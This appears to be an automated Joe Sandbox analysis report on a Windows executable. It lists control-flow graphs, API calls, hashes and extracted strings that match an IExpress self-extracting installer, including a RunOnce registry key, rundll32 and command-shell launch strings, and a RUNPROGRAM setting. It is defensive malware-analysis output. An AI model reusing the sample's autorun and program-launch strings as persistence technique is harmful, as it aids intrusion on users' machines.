                              control_flow_graph 0 7ff776d141b4-7ff776d14206 1 7ff776d14208-7ff776d14223 call 7ff776d151f8 0->1 2 7ff776d14229-7ff776d14231 0->2 1->2 9 7ff776d1434a-7ff776d14373 call 7ff776d14f2c 1->9 4 7ff776d14235-7ff776d14257 memset 2->4 6 7ff776d14378-7ff776d1438b 4->6 7 7ff776d1425d-7ff776d14278 call 7ff776d151f8 4->7 8 7ff776d1438f-7ff776d14399 6->8 7->9 18 7ff776d1427e-7ff776d14284 7->18 12 7ff776d1439b-7ff776d143a1 8->12 13 7ff776d143ad-7ff776d143b8 8->13 19 7ff776d145e9 9->19 12->13 16 7ff776d143a3-7ff776d143ab 12->16 17 7ff776d143bb-7ff776d143be 13->17 16->8 16->13 20 7ff776d1441e-7ff776d14433 call 7ff776d115f4 17->20 21 7ff776d143c0-7ff776d143d8 call 7ff776d151f8 17->21 22 7ff776d1428d-7ff776d14290 18->22 23 7ff776d14286-7ff776d1428b 18->23 25 7ff776d145eb-7ff776d1461a call 7ff776d186f0 19->25 20->19 35 7ff776d14439-7ff776d14440 20->35 21->9 38 7ff776d143de-7ff776d143e5 21->38 28 7ff776d1429d-7ff776d1429f 22->28 29 7ff776d14292-7ff776d1429b 22->29 27 7ff776d142a5 23->27 30 7ff776d142a8-7ff776d142ab 27->30 28->30 31 7ff776d142a1 28->31 29->27 30->17 36 7ff776d142b1-7ff776d142bb 30->36 31->27 39 7ff776d14460-7ff776d14462 35->39 40 7ff776d14442-7ff776d14449 35->40 41 7ff776d14327-7ff776d1432a 36->41 42 7ff776d142bd-7ff776d142c0 36->42 43 7ff776d143eb-7ff776d14418 CompareStringA 38->43 44 7ff776d146d3-7ff776d146da 38->44 50 7ff776d14468-7ff776d1446f 39->50 51 7ff776d14593-7ff776d1459f call 7ff776d14838 39->51 40->39 45 7ff776d1444b-7ff776d14452 40->45 41->20 52 7ff776d14330-7ff776d14348 call 7ff776d151f8 41->52 46 7ff776d142cb-7ff776d142cd 42->46 47 7ff776d142c2-7ff776d142c9 42->47 43->20 43->44 48 7ff776d14828-7ff776d1482a 44->48 49 7ff776d146e0-7ff776d146e7 44->49 45->39 53 7ff776d14454-7ff776d14456 45->53 46->19 55 7ff776d142d3 46->55 54 7ff776d142da-7ff776d142eb call 7ff776d151f8 47->54 48->25 49->48 56 7ff776d146ed-7ff776d1471c RegOpenKeyExA 49->56 57 7ff776d14694-7ff776d146ce call 7ff776d14f2c LocalFree 50->57 58 7ff776d14475-7ff776d14477 50->58 61 7ff776d145a4-7ff776d145a6 51->61 52->9 52->17 53->50 64 7ff776d14458-7ff776d1445b call 7ff776d11d10 53->64 54->9 79 7ff776d142ed-7ff776d1431d CompareStringA 54->79 55->54 56->48 65 7ff776d14722-7ff776d14761 RegQueryValueExA 56->65 57->19 58->51 67 7ff776d1447d-7ff776d14484 58->67 68 7ff776d145a8-7ff776d145be LocalFree 61->68 69 7ff776d145da-7ff776d145e4 LocalFree 61->69 64->39 72 7ff776d14817-7ff776d14823 RegCloseKey 65->72 73 7ff776d14767-7ff776d14796 memset GetSystemDirectoryA 65->73 67->51 75 7ff776d1448a-7ff776d14495 call 7ff776d17c50 67->75 68->44 76 7ff776d145c4-7ff776d145c9 68->76 69->19 72->48 77 7ff776d14798-7ff776d147a9 call 7ff776d17e08 73->77 78 7ff776d147ae-7ff776d147d7 call 7ff776d110bc 73->78 86 7ff776d1449b-7ff776d144b7 GetProcAddress 75->86 87 7ff776d1466f-7ff776d14692 call 7ff776d14f2c 75->87 76->4 77->78 91 7ff776d147de-7ff776d147e5 78->91 79->41 82 7ff776d1431f-7ff776d14322 79->82 82->20 88 7ff776d1461c-7ff776d14649 call 7ff776d14f2c FreeLibrary 86->88 89 7ff776d144bd-7ff776d1450b 86->89 97 7ff776d1464e-7ff776d1466a LocalFree call 7ff776d17958 87->97 88->97 93 7ff776d1450d-7ff776d14511 89->93 94 7ff776d14515-7ff776d1451d 89->94 91->91 92 7ff776d147e7-7ff776d14812 RegSetValueExA 91->92 92->72 93->94 98 7ff776d14527-7ff776d14529 94->98 99 7ff776d1451f-7ff776d14523 94->99 97->19 101 7ff776d1452b-7ff776d1452f 98->101 102 7ff776d14533-7ff776d1453b 98->102 99->98 101->102 104 7ff776d1453d-7ff776d14541 102->104 105 7ff776d14545-7ff776d14547 102->105 104->105 107 7ff776d14549-7ff776d1454d 105->107 108 7ff776d14551-7ff776d1457e 105->108 107->108 110 7ff776d145ce-7ff776d145d5 FreeLibrary 108->110 111 7ff776d14580-7ff776d14591 FreeLibrary 108->111 110->69 111->68
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$vclib$wextract_cleanup0
                              • API String ID: 2679723528-2867732137
                              • Opcode ID: 710c5497f36115af641b03e74af43594c4503a0d4cad7b07eed2db7f93ad28eb
                              • Instruction ID: 925cb1e51fa9154f3ffd19c41c57c3ab7f07c4451769a805f195f59c038bc569
                              • Opcode Fuzzy Hash: 710c5497f36115af641b03e74af43594c4503a0d4cad7b07eed2db7f93ad28eb
                              • Instruction Fuzzy Hash: 31026FB3A3C64286EF28AB30AC541BBB7A1FB84744FC60935D94D46658EFBCD549C720
                              Function 00007FF776D11D10 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 182registrylibrarymemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                              • API String ID: 1522771004-3208851462
                              • Opcode ID: 24ed6fb47e8a667b3f55c12bcb1148da6ee4727cab3b4af91dd3ecb4249650ba
                              • Instruction ID: 0d07cf7869bc6c1b749db454f9ac7a4d013daa958032cbe7f83dc79b531fc93f
                              • Opcode Fuzzy Hash: 24ed6fb47e8a667b3f55c12bcb1148da6ee4727cab3b4af91dd3ecb4249650ba
                              • Instruction Fuzzy Hash: A8817CB3A3CA8286EF14AB21EC402BAB7A1FB89B50F865531D94E47758DFBCD505C710
                              Function 00007FF776D115F4 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 375memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 144 7ff776d115f4-7ff776d11646 145 7ff776d11649-7ff776d11653 144->145 146 7ff776d11668-7ff776d1167a 145->146 147 7ff776d11655-7ff776d1165b 145->147 149 7ff776d11689-7ff776d11690 146->149 150 7ff776d1167c-7ff776d11687 146->150 147->146 148 7ff776d1165d-7ff776d11666 147->148 148->145 148->146 151 7ff776d11694-7ff776d116b2 call 7ff776d11558 149->151 150->151 154 7ff776d1171e-7ff776d11730 151->154 155 7ff776d116b4 151->155 156 7ff776d11735-7ff776d1173f 154->156 157 7ff776d116b7-7ff776d116be 155->157 158 7ff776d11741-7ff776d11747 156->158 159 7ff776d11754-7ff776d1176d call 7ff776d17e08 156->159 157->157 160 7ff776d116c0-7ff776d116c4 157->160 158->159 161 7ff776d11749-7ff776d11752 158->161 164 7ff776d11772-7ff776d11782 call 7ff776d17fb8 159->164 160->154 163 7ff776d116c6-7ff776d116cd 160->163 161->156 161->159 165 7ff776d116cf-7ff776d116d2 163->165 166 7ff776d116d4-7ff776d116d6 163->166 174 7ff776d11788-7ff776d117b5 CompareStringA 164->174 175 7ff776d119d3-7ff776d119e3 call 7ff776d17fb8 164->175 165->166 168 7ff776d116dc-7ff776d116ec 165->168 166->154 169 7ff776d116d8-7ff776d116da 166->169 171 7ff776d116ef-7ff776d116f9 168->171 169->154 169->168 172 7ff776d116fb-7ff776d11701 171->172 173 7ff776d1170e-7ff776d1171c 171->173 172->173 176 7ff776d11703-7ff776d1170c 172->176 173->164 174->175 178 7ff776d117bb-7ff776d117cf GetFileAttributesA 174->178 183 7ff776d119e9-7ff776d11a16 CompareStringA 175->183 184 7ff776d11a83-7ff776d11aa1 LocalAlloc 175->184 176->171 176->173 180 7ff776d119ab-7ff776d119b3 178->180 181 7ff776d117d5-7ff776d117dd 178->181 182 7ff776d119b8-7ff776d119ce call 7ff776d14f2c 180->182 181->180 185 7ff776d117e3-7ff776d117ff call 7ff776d11558 181->185 199 7ff776d11b8f-7ff776d11bb8 call 7ff776d186f0 182->199 183->184 190 7ff776d11a18-7ff776d11a1f 183->190 188 7ff776d11a5a-7ff776d11a65 184->188 189 7ff776d11aa3-7ff776d11ab7 GetFileAttributesA 184->189 196 7ff776d11801-7ff776d1181e call 7ff776d11558 185->196 197 7ff776d11823-7ff776d11841 LocalAlloc 185->197 188->182 193 7ff776d11ab9-7ff776d11abb 189->193 194 7ff776d11b36-7ff776d11b40 189->194 195 7ff776d11a22-7ff776d11a29 190->195 193->194 200 7ff776d11abd-7ff776d11ace 193->200 198 7ff776d11b47-7ff776d11b51 194->198 195->195 201 7ff776d11a2b 195->201 196->197 197->188 204 7ff776d11847-7ff776d118c3 GetPrivateProfileIntA GetPrivateProfileStringA 197->204 205 7ff776d11b53-7ff776d11b58 198->205 206 7ff776d11b65-7ff776d11b70 198->206 207 7ff776d11ad5-7ff776d11adf 200->207 202 7ff776d11a30-7ff776d11a37 201->202 202->202 209 7ff776d11a39-7ff776d11a58 LocalAlloc 202->209 210 7ff776d11940-7ff776d1194f 204->210 211 7ff776d118c5-7ff776d118d4 204->211 205->206 212 7ff776d11b5a-7ff776d11b63 205->212 213 7ff776d11b73-7ff776d11b7d call 7ff776d12ae8 206->213 214 7ff776d11ae1-7ff776d11ae7 207->214 215 7ff776d11af4-7ff776d11b05 207->215 209->188 219 7ff776d11a6a-7ff776d11a7e call 7ff776d110bc 209->219 217 7ff776d11951-7ff776d11971 GetShortPathNameA 210->217 218 7ff776d11973 210->218 220 7ff776d118d7-7ff776d118e1 211->220 212->198 212->206 228 7ff776d11b82-7ff776d11b8c 213->228 214->215 222 7ff776d11ae9-7ff776d11af2 214->222 215->213 223 7ff776d11b07-7ff776d11b0a 215->223 224 7ff776d1197a-7ff776d119a6 call 7ff776d110bc 217->224 218->224 219->228 226 7ff776d118e3-7ff776d118e9 220->226 227 7ff776d118f6-7ff776d1190c 220->227 222->207 222->215 223->213 229 7ff776d11b0c-7ff776d11b34 call 7ff776d11008 * 2 223->229 224->228 226->227 233 7ff776d118eb-7ff776d118f4 226->233 234 7ff776d1190f-7ff776d11919 227->234 228->199 229->213 233->220 233->227 237 7ff776d1191b-7ff776d11920 234->237 238 7ff776d1192d-7ff776d1193b 234->238 237->238 240 7ff776d11922-7ff776d1192b 237->240 238->228 240->234 240->238
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: PrivateProfileString$AllocAttributesCompareFileLocalNamePathShort
                              • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 3180205287-1095083631
                              • Opcode ID: 285327837915dcdb5446a0141fb2b704f1838363777c81596740a24fe6d4b02e
                              • Instruction ID: 4540ecb5e007324db7c9c7a7b786c4097496f83287c48da0bf5de43b6e828928
                              • Opcode Fuzzy Hash: 285327837915dcdb5446a0141fb2b704f1838363777c81596740a24fe6d4b02e
                              • Instruction Fuzzy Hash: BCF1BFA3A3C78285EE1AAF30DC102BAA7A1EB45744FD54932DA4D07799DF7DD909C320
                              Function 00007FF776D168F0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 242 7ff776d168f0-7ff776d16950 call 7ff776d151f8 LocalAlloc 245 7ff776d16982-7ff776d16996 call 7ff776d151f8 242->245 246 7ff776d16952-7ff776d16975 call 7ff776d14f2c call 7ff776d17958 242->246 252 7ff776d16998-7ff776d169cf call 7ff776d14f2c LocalFree 245->252 253 7ff776d169d1-7ff776d16a16 lstrcmpA LocalFree 245->253 260 7ff776d1697b-7ff776d1697d 246->260 252->260 254 7ff776d16a18-7ff776d16a1a 253->254 255 7ff776d16a63-7ff776d16a69 253->255 258 7ff776d16a27 254->258 259 7ff776d16a1c-7ff776d16a25 254->259 261 7ff776d16a6f-7ff776d16a75 255->261 262 7ff776d16d40-7ff776d16d64 call 7ff776d17d28 255->262 264 7ff776d16a2a-7ff776d16a3a call 7ff776d16710 258->264 259->258 259->264 265 7ff776d16d66-7ff776d16d92 call 7ff776d186f0 260->265 261->262 267 7ff776d16a7b-7ff776d16a9c GetTempPathA 261->267 262->265 277 7ff776d16d3b-7ff776d16d3e 264->277 278 7ff776d16a40-7ff776d16a5e call 7ff776d14f2c 264->278 271 7ff776d16ad9-7ff776d16ae5 267->271 272 7ff776d16a9e-7ff776d16aaa call 7ff776d16710 267->272 274 7ff776d16ae8-7ff776d16aeb 271->274 280 7ff776d16aaf-7ff776d16ab1 272->280 279 7ff776d16af0-7ff776d16afa 274->279 277->265 278->260 283 7ff776d16afc-7ff776d16b01 279->283 284 7ff776d16b0d-7ff776d16b1f 279->284 280->277 281 7ff776d16ab7-7ff776d16ac1 call 7ff776d12490 280->281 281->271 294 7ff776d16ac3-7ff776d16ad3 call 7ff776d16710 281->294 283->284 287 7ff776d16b03-7ff776d16b0b 283->287 288 7ff776d16d07-7ff776d16d30 GetWindowsDirectoryA call 7ff776d16f14 284->288 289 7ff776d16b25-7ff776d16b3b GetDriveTypeA 284->289 287->279 287->284 288->260 301 7ff776d16d36 288->301 292 7ff776d16b3d-7ff776d16b40 289->292 293 7ff776d16b42-7ff776d16b56 GetFileAttributesA 289->293 292->293 296 7ff776d16b5c-7ff776d16b5f 292->296 293->296 297 7ff776d16be9-7ff776d16bfc call 7ff776d16f14 293->297 294->271 294->277 298 7ff776d16bd9 296->298 299 7ff776d16b61-7ff776d16b6b 296->299 309 7ff776d16bfe-7ff776d16c0a call 7ff776d12490 297->309 310 7ff776d16c20-7ff776d16c2c call 7ff776d12490 297->310 303 7ff776d16bdd-7ff776d16be4 298->303 299->303 304 7ff776d16b6d-7ff776d16b7f 299->304 301->274 308 7ff776d16cfe-7ff776d16d01 303->308 304->303 307 7ff776d16b81-7ff776d16bad GetDiskFreeSpaceA 304->307 307->298 312 7ff776d16baf-7ff776d16bd0 MulDiv 307->312 308->288 308->289 309->298 319 7ff776d16c0c-7ff776d16c1e call 7ff776d16f14 309->319 317 7ff776d16c2e-7ff776d16c3d GetWindowsDirectoryA 310->317 318 7ff776d16c42-7ff776d16c6a call 7ff776d17e08 GetFileAttributesA 310->318 312->298 315 7ff776d16bd2-7ff776d16bd7 312->315 315->297 315->298 317->318 324 7ff776d16c6c-7ff776d16c7f CreateDirectoryA 318->324 325 7ff776d16c81 318->325 319->298 319->310 326 7ff776d16c84-7ff776d16c86 324->326 325->326 327 7ff776d16c88-7ff776d16c97 326->327 328 7ff776d16c99-7ff776d16cba SetFileAttributesA 326->328 327->308 329 7ff776d16cbd-7ff776d16cc7 328->329 330 7ff776d16cc9-7ff776d16ccf 329->330 331 7ff776d16cdb-7ff776d16cf8 call 7ff776d16710 329->331 330->331 333 7ff776d16cd1-7ff776d16cd9 330->333 331->277 335 7ff776d16cfa 331->335 333->329 333->331 335->308
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$AttributesDirectoryFileFindLocal$LoadWindows$AllocCreateDialogDiskDriveErrorIndirectLastLockParamPathSizeofSpaceTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 1722149602-675003171
                              • Opcode ID: 5f82ba56f4aaa81db981931d09dfdadb71124d73ce1192ccebec0ecc8fc2ed78
                              • Instruction ID: 113e660048452a51b369141635857404e2e3b1db0e3ffd59d0bbc19fa6120c39
                              • Opcode Fuzzy Hash: 5f82ba56f4aaa81db981931d09dfdadb71124d73ce1192ccebec0ecc8fc2ed78
                              • Instruction Fuzzy Hash: 95D194A3A3C68286EF18AB7098501BBF7A1FB85740FD24835DA4E57698DFBDD805C710
                              Function 00007FF776D16F14 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 336 7ff776d16f14-7ff776d16f59 337 7ff776d16f5b-7ff776d16f5e 336->337 338 7ff776d16f63-7ff776d16f8c GetCurrentDirectoryA SetCurrentDirectoryA 336->338 339 7ff776d17262-7ff776d17291 call 7ff776d186f0 337->339 340 7ff776d16fbb-7ff776d16ff6 GetDiskFreeSpaceA 338->340 341 7ff776d16f8e-7ff776d16fb6 call 7ff776d14f2c call 7ff776d17958 338->341 342 7ff776d171da-7ff776d1722f memset call 7ff776d17958 GetLastError FormatMessageA 340->342 343 7ff776d16ffc-7ff776d17024 MulDiv 340->343 358 7ff776d17260 341->358 355 7ff776d17234-7ff776d1725b call 7ff776d14f2c SetCurrentDirectoryA 342->355 343->342 348 7ff776d1702a-7ff776d17060 GetVolumeInformationA 343->348 352 7ff776d170c1-7ff776d170e5 SetCurrentDirectoryA 348->352 353 7ff776d17062-7ff776d170bc memset call 7ff776d17958 GetLastError FormatMessageA 348->353 357 7ff776d170e9-7ff776d170f0 352->357 353->355 355->358 361 7ff776d170f2-7ff776d170f7 357->361 362 7ff776d17103-7ff776d17116 357->362 358->339 361->362 364 7ff776d170f9-7ff776d17101 361->364 365 7ff776d1711a-7ff776d1711d 362->365 364->357 364->362 366 7ff776d1711f-7ff776d17128 365->366 367 7ff776d17150-7ff776d17157 365->367 366->365 368 7ff776d1712a 366->368 369 7ff776d17159-7ff776d17161 367->369 370 7ff776d17186-7ff776d17197 367->370 368->367 371 7ff776d1712c-7ff776d1714b call 7ff776d14f2c 368->371 369->370 372 7ff776d17163-7ff776d17184 369->372 373 7ff776d1719a-7ff776d171a2 370->373 371->358 372->373 375 7ff776d171be-7ff776d171c1 373->375 376 7ff776d171a4-7ff776d171a8 373->376 379 7ff776d171c7-7ff776d171ca 375->379 380 7ff776d171c3-7ff776d171c5 375->380 378 7ff776d171aa 376->378 381 7ff776d171cc-7ff776d171d5 378->381 382 7ff776d171ac-7ff776d171b9 call 7ff776d12520 378->382 379->378 380->378 381->339 382->339
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CurrentDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1611563598-4151094324
                              • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                              • Instruction ID: 88e6525fa6a557f4e8154e29be2f71a3973b48a512a4e53a90a105376de19e31
                              • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                              • Instruction Fuzzy Hash: 7BA181B7A3C64186EF28AB30E85066BFBA1FB89744F815435EA4D03758DFBCD8458B10
                              Function 00007FF776D15F80 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                              • Instruction ID: 6837778ef63c39f4266a186bd13f8989dff8f29525c0e1335bc7e6b209d5e5df
                              • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                              • Instruction Fuzzy Hash: 27512CB2A3CA4286FF18AB70EC54376A6A1FB49745FC24935C90D06659DFBCE444C620
                              Function 00007FF776D12F7B Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143synchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 412 7ff776d12f7b-7ff776d12fbc CreateEventA SetEvent call 7ff776d151f8 415 7ff776d12feb-7ff776d12ff3 412->415 416 7ff776d12fbe-7ff776d12fc8 412->416 417 7ff776d12ffd-7ff776d13018 call 7ff776d151f8 415->417 418 7ff776d12ff5-7ff776d12ff7 415->418 419 7ff776d12fca-7ff776d12fe6 call 7ff776d14f2c 416->419 427 7ff776d1301a-7ff776d13024 417->427 428 7ff776d13026-7ff776d13044 CreateMutexA 417->428 418->417 420 7ff776d130cb-7ff776d130db call 7ff776d17320 418->420 429 7ff776d131e6 419->429 430 7ff776d130ec-7ff776d130f3 420->430 431 7ff776d130dd-7ff776d131e1 call 7ff776d14f2c 420->431 427->419 428->420 432 7ff776d1304a-7ff776d1305b GetLastError 428->432 433 7ff776d131e8-7ff776d1320b call 7ff776d186f0 429->433 435 7ff776d130f5-7ff776d13101 call 7ff776d12034 430->435 436 7ff776d13106-7ff776d13125 FindResourceExA 430->436 431->429 432->420 437 7ff776d1305d-7ff776d13070 432->437 435->429 440 7ff776d13127-7ff776d13139 LoadResource 436->440 441 7ff776d1313c-7ff776d13143 436->441 442 7ff776d1308a-7ff776d130a7 call 7ff776d14f2c 437->442 443 7ff776d13072-7ff776d13088 call 7ff776d14f2c 437->443 440->441 448 7ff776d13151-7ff776d13158 441->448 449 7ff776d13145-7ff776d1314c #17 441->449 442->420 455 7ff776d130a9-7ff776d130c6 CloseHandle 442->455 443->455 452 7ff776d1315a-7ff776d1315d 448->452 453 7ff776d13162-7ff776d1316c call 7ff776d13d34 448->453 449->448 452->433 453->429 458 7ff776d1316e-7ff776d1317d 453->458 455->429 458->452 459 7ff776d1317f-7ff776d13189 458->459 459->452 460 7ff776d1318b-7ff776d13192 459->460 460->452 461 7ff776d13194-7ff776d1319b call 7ff776d11258 460->461 461->452 464 7ff776d1319d-7ff776d131c9 call 7ff776d17d28 461->464 464->429 467 7ff776d131cb 464->467 467->452
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$CreateEventLoad$CloseErrorFreeHandleLastLockMutexSizeofVersionmemcpy_s
                              • String ID: $EXTRACTOPT$INSTANCECHECK$VERCHECK$vclib
                              • API String ID: 774100294-3221951907
                              • Opcode ID: e4dd6a0e438f94823f4263b6696aa477d9b79ea039b0de3499e29df42d635c63
                              • Instruction ID: 8989d8449e6cdff9df338b33adaa42a69ef4ce62c437cb2638ba48f122f680ba
                              • Opcode Fuzzy Hash: e4dd6a0e438f94823f4263b6696aa477d9b79ea039b0de3499e29df42d635c63
                              • Instruction Fuzzy Hash: 20616BA3A3C64286FF287B30EC103BBE691AF85755FC24835D84D46699DFFCA5458A20
                              Function 00007FF776D13214 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152libraryfileloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 495 7ff776d13214-7ff776d1323c 496 7ff776d13269-7ff776d13270 call 7ff776d161d4 495->496 497 7ff776d1323e-7ff776d13244 495->497 506 7ff776d13368 496->506 507 7ff776d13276-7ff776d1327d call 7ff776d168f0 496->507 499 7ff776d1325c-7ff776d13263 call 7ff776d14064 497->499 500 7ff776d13246 call 7ff776d16294 497->500 499->496 499->506 504 7ff776d1324b-7ff776d1324d 500->504 504->506 508 7ff776d13253-7ff776d1325a 504->508 510 7ff776d1336a-7ff776d1338a call 7ff776d186f0 506->510 507->506 513 7ff776d13283-7ff776d132c5 GetSystemDirectoryA call 7ff776d17e08 LoadLibraryA 507->513 508->496 508->499 517 7ff776d132c7-7ff776d132e0 GetProcAddress 513->517 518 7ff776d132fb-7ff776d13310 FreeLibrary 513->518 517->518 521 7ff776d132e2-7ff776d132f5 DecryptFileA 517->521 519 7ff776d133a5-7ff776d133ba SetCurrentDirectoryA 518->519 520 7ff776d13316-7ff776d1331c 518->520 522 7ff776d133bc-7ff776d133c1 519->522 523 7ff776d133c3-7ff776d133c9 519->523 520->519 524 7ff776d13322-7ff776d1333d GetWindowsDirectoryA 520->524 521->518 525 